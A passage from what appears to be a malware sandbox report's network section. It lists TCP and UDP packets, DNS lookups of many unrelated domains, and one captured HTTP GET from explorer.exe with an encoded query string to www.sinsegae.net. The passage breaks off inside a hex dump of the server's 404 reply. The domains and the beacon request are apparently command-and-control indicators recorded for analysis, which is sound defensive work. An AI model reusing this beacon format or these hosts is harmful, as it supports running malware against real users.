                                                                                                          Jun 3, 2022 08:17:55.760283947 CEST8049836107.187.232.173192.168.2.4
                                                                                                          Jun 3, 2022 08:18:00.775405884 CEST4983880192.168.2.4172.16.0.13
                                                                                                          Jun 3, 2022 08:18:03.813107014 CEST4983880192.168.2.4172.16.0.13
                                                                                                          Jun 3, 2022 08:18:09.813579082 CEST4983880192.168.2.4172.16.0.13
                                                                                                          Jun 3, 2022 08:18:23.456084013 CEST4988380192.168.2.4172.16.0.13
                                                                                                          Jun 3, 2022 08:18:24.883169889 CEST4988480192.168.2.4172.16.0.13
                                                                                                          Jun 3, 2022 08:18:26.455562115 CEST4988380192.168.2.4172.16.0.13
                                                                                                          Jun 3, 2022 08:18:27.877589941 CEST4988480192.168.2.4172.16.0.13
                                                                                                          Jun 3, 2022 08:18:32.456053019 CEST4988380192.168.2.4172.16.0.13
                                                                                                          Jun 3, 2022 08:18:33.878137112 CEST4988480192.168.2.4172.16.0.13
                                                                                                          Jun 3, 2022 08:18:46.478252888 CEST4988580192.168.2.4172.16.0.13
                                                                                                          Jun 3, 2022 08:18:48.978605986 CEST4988680192.168.2.4172.16.0.13
                                                                                                          Jun 3, 2022 08:18:49.488709927 CEST4988580192.168.2.4172.16.0.13
                                                                                                          Jun 3, 2022 08:18:49.617053986 CEST8049824198.44.241.20192.168.2.4
                                                                                                          Jun 3, 2022 08:18:49.617072105 CEST8049824198.44.241.20192.168.2.4
                                                                                                          Jun 3, 2022 08:18:49.617213964 CEST4982480192.168.2.4198.44.241.20
                                                                                                          Jun 3, 2022 08:18:49.618309975 CEST4982480192.168.2.4198.44.241.20
                                                                                                          Jun 3, 2022 08:18:51.990520954 CEST4988680192.168.2.4172.16.0.13
                                                                                                          Jun 3, 2022 08:18:55.551909924 CEST4988580192.168.2.4172.16.0.13
                                                                                                          Jun 3, 2022 08:18:57.989511013 CEST4988680192.168.2.4172.16.0.13
                                                                                                          Jun 3, 2022 08:19:10.028788090 CEST4988780192.168.2.4172.16.0.13
                                                                                                          Jun 3, 2022 08:19:13.037627935 CEST4988780192.168.2.4172.16.0.13
                                                                                                          Jun 3, 2022 08:19:18.145947933 CEST4988880192.168.2.423.227.38.74
                                                                                                          Jun 3, 2022 08:19:18.162981033 CEST804988823.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.163197041 CEST4988880192.168.2.423.227.38.74
                                                                                                          Jun 3, 2022 08:19:18.163798094 CEST4988880192.168.2.423.227.38.74
                                                                                                          Jun 3, 2022 08:19:18.163846016 CEST4988880192.168.2.423.227.38.74
                                                                                                          Jun 3, 2022 08:19:18.164807081 CEST4988980192.168.2.423.227.38.74
                                                                                                          Jun 3, 2022 08:19:18.180922031 CEST804988823.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.181655884 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.181678057 CEST804988823.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.181813955 CEST4988980192.168.2.423.227.38.74
                                                                                                          Jun 3, 2022 08:19:18.181883097 CEST4988880192.168.2.423.227.38.74
                                                                                                          Jun 3, 2022 08:19:18.184734106 CEST4988980192.168.2.423.227.38.74
                                                                                                          Jun 3, 2022 08:19:18.186062098 CEST4989080192.168.2.423.227.38.74
                                                                                                          Jun 3, 2022 08:19:18.201057911 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.201112986 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.201122046 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.201143026 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.201150894 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.201159954 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.201196909 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.201212883 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.201225996 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.201267958 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.201390028 CEST4988980192.168.2.423.227.38.74
                                                                                                          Jun 3, 2022 08:19:18.201456070 CEST4988980192.168.2.423.227.38.74
                                                                                                          Jun 3, 2022 08:19:18.202415943 CEST804989023.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.202543020 CEST4989080192.168.2.423.227.38.74
                                                                                                          Jun 3, 2022 08:19:18.202693939 CEST4989080192.168.2.423.227.38.74
                                                                                                          Jun 3, 2022 08:19:18.217741966 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.217771053 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.217791080 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.217813969 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.217837095 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.217855930 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.217874050 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.217921972 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.217945099 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.218009949 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.218030930 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.218051910 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.218074083 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.218094110 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.218115091 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.218170881 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.218194008 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.219019890 CEST804989023.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.260520935 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.260586023 CEST804989023.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.260644913 CEST804989023.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.260694981 CEST804989023.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.260750055 CEST804989023.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.260754108 CEST4989080192.168.2.423.227.38.74
                                                                                                          Jun 3, 2022 08:19:18.260791063 CEST804989023.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.260831118 CEST804989023.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.260857105 CEST4989080192.168.2.423.227.38.74
                                                                                                          Jun 3, 2022 08:19:18.260868073 CEST804989023.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.260979891 CEST4989080192.168.2.423.227.38.74
                                                                                                          Jun 3, 2022 08:19:18.261002064 CEST4989080192.168.2.423.227.38.74
                                                                                                          Jun 3, 2022 08:19:18.261029005 CEST4989080192.168.2.423.227.38.74
                                                                                                          Jun 3, 2022 08:19:18.581618071 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.581721067 CEST4988980192.168.2.423.227.38.74
                                                                                                          Jun 3, 2022 08:19:18.581734896 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.581794024 CEST4988980192.168.2.423.227.38.74
                                                                                                          Jun 3, 2022 08:19:18.581804037 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.581851959 CEST4988980192.168.2.423.227.38.74
                                                                                                          Jun 3, 2022 08:19:18.581891060 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.581937075 CEST4988980192.168.2.423.227.38.74
                                                                                                          Jun 3, 2022 08:19:18.581964016 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.582015038 CEST4988980192.168.2.423.227.38.74
                                                                                                          Jun 3, 2022 08:19:18.582031965 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.582086086 CEST4988980192.168.2.423.227.38.74
                                                                                                          Jun 3, 2022 08:19:18.582093000 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.582142115 CEST4988980192.168.2.423.227.38.74
                                                                                                          Jun 3, 2022 08:19:18.582148075 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.582185030 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.582195044 CEST4988980192.168.2.423.227.38.74
                                                                                                          Jun 3, 2022 08:19:18.582216978 CEST804988923.227.38.74192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.582232952 CEST4988980192.168.2.423.227.38.74
                                                                                                          Jun 3, 2022 08:19:18.582269907 CEST4988980192.168.2.423.227.38.74
                                                                                                          Jun 3, 2022 08:19:19.038108110 CEST4988780192.168.2.4172.16.0.13
                                                                                                          Jun 3, 2022 08:19:23.446496010 CEST4989180192.168.2.4154.36.145.110
                                                                                                          Jun 3, 2022 08:19:23.618494987 CEST8049891154.36.145.110192.168.2.4
                                                                                                          Jun 3, 2022 08:19:23.618602037 CEST4989180192.168.2.4154.36.145.110
                                                                                                          Jun 3, 2022 08:19:23.618773937 CEST4989180192.168.2.4154.36.145.110
                                                                                                          Jun 3, 2022 08:19:23.618830919 CEST4989180192.168.2.4154.36.145.110
                                                                                                          Jun 3, 2022 08:19:23.619534969 CEST4989280192.168.2.4154.36.145.110
                                                                                                          Jun 3, 2022 08:19:23.789845943 CEST8049891154.36.145.110192.168.2.4
                                                                                                          Jun 3, 2022 08:19:23.792843103 CEST8049892154.36.145.110192.168.2.4
                                                                                                          Jun 3, 2022 08:19:23.792926073 CEST4989280192.168.2.4154.36.145.110
                                                                                                          Jun 3, 2022 08:19:23.793278933 CEST8049891154.36.145.110192.168.2.4
                                                                                                          Jun 3, 2022 08:19:23.793343067 CEST4989180192.168.2.4154.36.145.110
                                                                                                          Jun 3, 2022 08:19:23.795093060 CEST4989280192.168.2.4154.36.145.110
                                                                                                          Jun 3, 2022 08:19:23.795716047 CEST4989380192.168.2.4154.36.145.110
                                                                                                          Jun 3, 2022 08:19:23.968034983 CEST8049893154.36.145.110192.168.2.4
                                                                                                          Jun 3, 2022 08:19:23.968137980 CEST4989380192.168.2.4154.36.145.110
                                                                                                          Jun 3, 2022 08:19:23.968199015 CEST4989380192.168.2.4154.36.145.110
                                                                                                          Jun 3, 2022 08:19:23.968451977 CEST8049892154.36.145.110192.168.2.4
                                                                                                          Jun 3, 2022 08:19:23.968545914 CEST4989280192.168.2.4154.36.145.110
                                                                                                          Jun 3, 2022 08:19:24.141791105 CEST8049892154.36.145.110192.168.2.4
                                                                                                          Jun 3, 2022 08:19:24.141803026 CEST8049892154.36.145.110192.168.2.4
                                                                                                          Jun 3, 2022 08:19:24.141880989 CEST8049892154.36.145.110192.168.2.4
                                                                                                          Jun 3, 2022 08:19:24.141885042 CEST4989280192.168.2.4154.36.145.110
                                                                                                          Jun 3, 2022 08:19:24.141963005 CEST8049892154.36.145.110192.168.2.4
                                                                                                          Jun 3, 2022 08:19:24.144052982 CEST8049893154.36.145.110192.168.2.4
                                                                                                          Jun 3, 2022 08:19:24.144079924 CEST8049893154.36.145.110192.168.2.4
                                                                                                          Jun 3, 2022 08:19:24.144093037 CEST8049893154.36.145.110192.168.2.4
                                                                                                          Jun 3, 2022 08:19:24.144222975 CEST4989380192.168.2.4154.36.145.110
                                                                                                          Jun 3, 2022 08:19:24.144256115 CEST4989380192.168.2.4154.36.145.110
                                                                                                          Jun 3, 2022 08:19:24.144325972 CEST4989380192.168.2.4154.36.145.110
                                                                                                          Jun 3, 2022 08:19:24.315207958 CEST8049892154.36.145.110192.168.2.4
                                                                                                          Jun 3, 2022 08:19:24.315231085 CEST8049892154.36.145.110192.168.2.4
                                                                                                          Jun 3, 2022 08:19:24.316760063 CEST8049893154.36.145.110192.168.2.4

                                                                                                          UDP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Jun 3, 2022 08:16:58.579248905 CEST6038153192.168.2.48.8.8.8
                                                                                                          Jun 3, 2022 08:16:58.598203897 CEST53603818.8.8.8192.168.2.4
                                                                                                          Jun 3, 2022 08:17:09.437704086 CEST5650953192.168.2.48.8.8.8
                                                                                                          Jun 3, 2022 08:17:09.454791069 CEST53565098.8.8.8192.168.2.4
                                                                                                          Jun 3, 2022 08:17:26.748796940 CEST5406953192.168.2.48.8.8.8
                                                                                                          Jun 3, 2022 08:17:26.875420094 CEST53540698.8.8.8192.168.2.4
                                                                                                          Jun 3, 2022 08:17:37.002288103 CEST5759453192.168.2.48.8.8.8
                                                                                                          Jun 3, 2022 08:17:37.137671947 CEST53575948.8.8.8192.168.2.4
                                                                                                          Jun 3, 2022 08:17:43.289014101 CEST5881653192.168.2.48.8.8.8
                                                                                                          Jun 3, 2022 08:17:43.313081026 CEST53588168.8.8.8192.168.2.4
                                                                                                          Jun 3, 2022 08:17:43.331497908 CEST5643753192.168.2.48.8.8.8
                                                                                                          Jun 3, 2022 08:17:43.359708071 CEST53564378.8.8.8192.168.2.4
                                                                                                          Jun 3, 2022 08:17:43.363398075 CEST6482553192.168.2.48.8.8.8
                                                                                                          Jun 3, 2022 08:17:43.389221907 CEST53648258.8.8.8192.168.2.4
                                                                                                          Jun 3, 2022 08:17:48.416826010 CEST5077853192.168.2.48.8.8.8
                                                                                                          Jun 3, 2022 08:17:48.596756935 CEST53507788.8.8.8192.168.2.4
                                                                                                          Jun 3, 2022 08:17:54.449160099 CEST5871553192.168.2.48.8.8.8
                                                                                                          Jun 3, 2022 08:17:54.875513077 CEST53587158.8.8.8192.168.2.4
                                                                                                          Jun 3, 2022 08:18:00.615473032 CEST5781653192.168.2.48.8.8.8
                                                                                                          Jun 3, 2022 08:18:00.645076990 CEST53578168.8.8.8192.168.2.4
                                                                                                          Jun 3, 2022 08:18:23.375132084 CEST5178753192.168.2.48.8.8.8
                                                                                                          Jun 3, 2022 08:18:23.429713011 CEST53517878.8.8.8192.168.2.4
                                                                                                          Jun 3, 2022 08:18:24.863167048 CEST5391653192.168.2.48.8.8.8
                                                                                                          Jun 3, 2022 08:18:24.882128954 CEST53539168.8.8.8192.168.2.4
                                                                                                          Jun 3, 2022 08:18:48.921485901 CEST6079053192.168.2.48.8.8.8
                                                                                                          Jun 3, 2022 08:18:48.977374077 CEST53607908.8.8.8192.168.2.4
                                                                                                          Jun 3, 2022 08:19:18.122982979 CEST6270853192.168.2.48.8.8.8
                                                                                                          Jun 3, 2022 08:19:18.144835949 CEST53627088.8.8.8192.168.2.4
                                                                                                          Jun 3, 2022 08:19:23.276204109 CEST6094653192.168.2.48.8.8.8
                                                                                                          Jun 3, 2022 08:19:23.441440105 CEST53609468.8.8.8192.168.2.4
                                                                                                          Jun 3, 2022 08:19:29.150656939 CEST5348353192.168.2.48.8.8.8
                                                                                                          Jun 3, 2022 08:19:29.171605110 CEST53534838.8.8.8192.168.2.4

                                                                                                          DNS Queries

                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                          Jun 3, 2022 08:16:58.579248905 CEST192.168.2.48.8.8.80x7ee5Standard query (0)www.sinsegae.netA (IP address)IN (0x0001)
                                                                                                          Jun 3, 2022 08:17:09.437704086 CEST192.168.2.48.8.8.80x5d18Standard query (0)www.shopcycles3.comA (IP address)IN (0x0001)
                                                                                                          Jun 3, 2022 08:17:26.748796940 CEST192.168.2.48.8.8.80xe024Standard query (0)www.drivetrianrepair.comA (IP address)IN (0x0001)
                                                                                                          Jun 3, 2022 08:17:37.002288103 CEST192.168.2.48.8.8.80xce3eStandard query (0)www.408wmountain.infoA (IP address)IN (0x0001)
                                                                                                          Jun 3, 2022 08:17:43.289014101 CEST192.168.2.48.8.8.80xc93eStandard query (0)www.pheife.comA (IP address)IN (0x0001)
                                                                                                          Jun 3, 2022 08:17:43.331497908 CEST192.168.2.48.8.8.80x8667Standard query (0)www.pheife.comA (IP address)IN (0x0001)
                                                                                                          Jun 3, 2022 08:17:43.363398075 CEST192.168.2.48.8.8.80x6a49Standard query (0)www.pheife.comA (IP address)IN (0x0001)
                                                                                                          Jun 3, 2022 08:17:48.416826010 CEST192.168.2.48.8.8.80x31f5Standard query (0)www.huiyi-sui.comA (IP address)IN (0x0001)
                                                                                                          Jun 3, 2022 08:17:54.449160099 CEST192.168.2.48.8.8.80xef6aStandard query (0)www.sarrafguler.comA (IP address)IN (0x0001)
                                                                                                          Jun 3, 2022 08:18:00.615473032 CEST192.168.2.48.8.8.80x697Standard query (0)www.sassafrasriver.infoA (IP address)IN (0x0001)
                                                                                                          Jun 3, 2022 08:18:23.375132084 CEST192.168.2.48.8.8.80x5b17Standard query (0)www.sassafrasriver.infoA (IP address)IN (0x0001)
                                                                                                          Jun 3, 2022 08:18:24.863167048 CEST192.168.2.48.8.8.80x833fStandard query (0)www.sassafrasriver.infoA (IP address)IN (0x0001)
                                                                                                          Jun 3, 2022 08:18:48.921485901 CEST192.168.2.48.8.8.80x2f49Standard query (0)www.sassafrasriver.infoA (IP address)IN (0x0001)
                                                                                                          Jun 3, 2022 08:19:18.122982979 CEST192.168.2.48.8.8.80xf0aaStandard query (0)www.theflysnare.comA (IP address)IN (0x0001)
                                                                                                          Jun 3, 2022 08:19:23.276204109 CEST192.168.2.48.8.8.80x475Standard query (0)www.huayugw.comA (IP address)IN (0x0001)
                                                                                                          Jun 3, 2022 08:19:29.150656939 CEST192.168.2.48.8.8.80x42a7Standard query (0)www.airvataus.comA (IP address)IN (0x0001)

                                                                                                          DNS Answers

                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                          Jun 3, 2022 08:16:58.598203897 CEST8.8.8.8192.168.2.40x7ee5No error (0)www.sinsegae.net185.254.241.173A (IP address)IN (0x0001)
                                                                                                          Jun 3, 2022 08:17:09.454791069 CEST8.8.8.8192.168.2.40x5d18No error (0)www.shopcycles3.com162.213.255.237A (IP address)IN (0x0001)
                                                                                                          Jun 3, 2022 08:17:26.875420094 CEST8.8.8.8192.168.2.40xe024No error (0)www.drivetrianrepair.coms.multiscreensite.comCNAME (Canonical name)IN (0x0001)
                                                                                                          Jun 3, 2022 08:17:26.875420094 CEST8.8.8.8192.168.2.40xe024No error (0)s.multiscreensite.comglobal.multiscreensite.comCNAME (Canonical name)IN (0x0001)
                                                                                                          Jun 3, 2022 08:17:26.875420094 CEST8.8.8.8192.168.2.40xe024No error (0)global.multiscreensite.comd1-hitch-eu-nlb-e064e2845fd0c838.elb.eu-central-1.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                          Jun 3, 2022 08:17:26.875420094 CEST8.8.8.8192.168.2.40xe024No error (0)d1-hitch-eu-nlb-e064e2845fd0c838.elb.eu-central-1.amazonaws.com18.193.36.153A (IP address)IN (0x0001)
                                                                                                          Jun 3, 2022 08:17:26.875420094 CEST8.8.8.8192.168.2.40xe024No error (0)d1-hitch-eu-nlb-e064e2845fd0c838.elb.eu-central-1.amazonaws.com3.127.73.216A (IP address)IN (0x0001)
                                                                                                          Jun 3, 2022 08:17:26.875420094 CEST8.8.8.8192.168.2.40xe024No error (0)d1-hitch-eu-nlb-e064e2845fd0c838.elb.eu-central-1.amazonaws.com3.67.141.185A (IP address)IN (0x0001)
                                                                                                          Jun 3, 2022 08:17:37.137671947 CEST8.8.8.8192.168.2.40xce3eNo error (0)www.408wmountain.info66.96.162.130A (IP address)IN (0x0001)
                                                                                                          Jun 3, 2022 08:17:43.313081026 CEST8.8.8.8192.168.2.40xc93eName error (3)www.pheife.comnonenoneA (IP address)IN (0x0001)
                                                                                                          Jun 3, 2022 08:17:43.359708071 CEST8.8.8.8192.168.2.40x8667Name error (3)www.pheife.comnonenoneA (IP address)IN (0x0001)
                                                                                                          Jun 3, 2022 08:17:43.389221907 CEST8.8.8.8192.168.2.40x6a49Name error (3)www.pheife.comnonenoneA (IP address)IN (0x0001)
                                                                                                          Jun 3, 2022 08:17:48.596756935 CEST8.8.8.8192.168.2.40x31f5No error (0)www.huiyi-sui.com198.44.241.20A (IP address)IN (0x0001)
                                                                                                          Jun 3, 2022 08:17:54.875513077 CEST8.8.8.8192.168.2.40xef6aNo error (0)www.sarrafguler.com107.187.232.173A (IP address)IN (0x0001)
                                                                                                          Jun 3, 2022 08:18:00.645076990 CEST8.8.8.8192.168.2.40x697No error (0)www.sassafrasriver.info172.16.0.13A (IP address)IN (0x0001)
                                                                                                          Jun 3, 2022 08:18:23.429713011 CEST8.8.8.8192.168.2.40x5b17No error (0)www.sassafrasriver.info172.16.0.13A (IP address)IN (0x0001)
                                                                                                          Jun 3, 2022 08:18:24.882128954 CEST8.8.8.8192.168.2.40x833fNo error (0)www.sassafrasriver.info172.16.0.13A (IP address)IN (0x0001)
                                                                                                          Jun 3, 2022 08:18:48.977374077 CEST8.8.8.8192.168.2.40x2f49No error (0)www.sassafrasriver.info172.16.0.13A (IP address)IN (0x0001)
                                                                                                          Jun 3, 2022 08:19:18.144835949 CEST8.8.8.8192.168.2.40xf0aaNo error (0)www.theflysnare.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                                                          Jun 3, 2022 08:19:18.144835949 CEST8.8.8.8192.168.2.40xf0aaNo error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                                                                                                          Jun 3, 2022 08:19:23.441440105 CEST8.8.8.8192.168.2.40x475No error (0)www.huayugw.com154.36.145.110A (IP address)IN (0x0001)
                                                                                                          Jun 3, 2022 08:19:29.171605110 CEST8.8.8.8192.168.2.40x42a7No error (0)www.airvataus.comairvataus.comCNAME (Canonical name)IN (0x0001)
                                                                                                          Jun 3, 2022 08:19:29.171605110 CEST8.8.8.8192.168.2.40x42a7No error (0)airvataus.com34.102.136.180A (IP address)IN (0x0001)

                                                                                                          HTTP Request Dependency Graph

                                                                                                          • www.sinsegae.net
                                                                                                          • www.shopcycles3.com
                                                                                                          • www.drivetrianrepair.com
                                                                                                          • www.408wmountain.info
                                                                                                          • www.huiyi-sui.com
                                                                                                          • www.sarrafguler.com
                                                                                                          • www.theflysnare.com
                                                                                                          • www.huayugw.com

                                                                                                          HTTP Packets

                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          0192.168.2.449780185.254.241.17380C:\Windows\explorer.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jun 3, 2022 08:16:58.893158913 CEST7704OUTGET /umat/?bT7tPLpx=D4TTb2HFoQH2akGSEaIGW9Q5orhATJxj88Hz932hPvAyMJtUsfmLZeVWMqqycYkj367i&Lls=Mzrp HTTP/1.1
                                                                                                          Host: www.sinsegae.net
                                                                                                          Connection: close
                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                          Data Ascii:
                                                                                                          Jun 3, 2022 08:16:59.184253931 CEST7705INHTTP/1.1 404 Not Found
                                                                                                          Content-Type: text/html
                                                                                                          Server: Microsoft-IIS/10.0
                                                                                                          X-Powered-By: ASP.NET
                                                                                                          Date: Fri, 03 Jun 2022 06:16:59 GMT
                                                                                                          Connection: close
                                                                                                          Content-Length: 1259
                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 6b 73 5f 63 5f 35 36 30 31 2d 31 39 38 37 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 c6 c4 c0 cf 20 b6 c7 b4 c2 20 b5 f0 b7 ba c5 cd b8 ae b8 a6 20 c3 a3 c0 bb 20 bc f6 20 be f8 bd c0 b4 cf b4 d9 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20
